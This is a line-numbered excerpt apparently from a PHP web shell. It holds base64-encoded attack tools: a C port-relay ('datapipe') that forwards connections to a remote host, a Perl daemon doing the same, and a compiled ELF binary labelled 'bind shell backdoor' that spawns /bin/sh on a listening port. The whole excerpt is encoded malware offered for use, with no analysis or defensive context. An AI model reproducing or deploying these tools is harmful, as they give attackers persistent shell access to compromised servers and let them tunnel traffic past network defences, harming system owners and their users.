2770	iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
2771	KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
2772	gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
2773	hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
2774	iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
2775	ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
2776	vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
2777	AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
2778	QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
2779	ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
2780	gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
2781	wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
2782	29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
2783	MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
2784	gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
2785	5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
2786	HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
2787	dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
2788	KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
2789	ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
2790	E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
2791	Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
2792	NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
2793	J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
2794	CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
2795	dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
2796	gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
2797	lsZSk7DQogIHJldHVybiAwOw0KfQ==";
2798	$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
2799	CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
2800	bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
2801	gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
2802	NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
2803	iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
2804	aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
2805	SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
2806	xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
2807	WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
2808	CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
2809	yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
2810	I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
2811	m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
2812	IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
2813	lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
2814	QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
2815	CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
2816	c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
2817	NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
2818	UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
2819	DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
2820	ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
2821	1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
2822	$port_bind_bd_cs="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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